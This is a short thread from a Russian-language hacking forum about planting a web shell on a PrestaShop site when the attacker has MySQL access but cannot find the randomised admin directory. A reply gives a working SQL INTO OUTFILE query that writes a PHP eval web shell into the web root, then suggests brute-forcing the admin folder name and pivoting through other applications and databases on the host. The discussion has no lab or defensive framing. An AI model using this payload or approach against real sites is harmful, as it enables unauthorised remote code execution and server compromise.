PrestaShop шелл

r0t0r

Newbie
21.11.2019
1
0
Господа, кто-нибудь знает или умеет лить шелл на PrestaShop без доступа к админке, но с доступом к бд мускула?
Поковырял CMS-ку - разрабы знатно заморочились с тем чтоб припрятать админку. При установке генерится рандомный набор символов, который добавляется к названию директории с админкой, в итоге получается что-то типа admin7381k7ayeu. Этот набор символов ни в каком месте больше не светится, ни в бд ни в файлах.
 
1) При условии что есть file_priv=y у пользователя базы и ты знаешь полный путь куда лить будешь файл + там есть права на запись и mysql стоит на том же сервере. Запросом вроде

Код:
SELECT "<?php eval($_GET['code']); ?>" into outfile "/var/www/codeby/yatvoyshell.php"

2) Посмотри алг как генерируется в движке имя этой папки, попробуй пробрутить.
3) Другие приложения на хосте? Доступ к другим базам?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab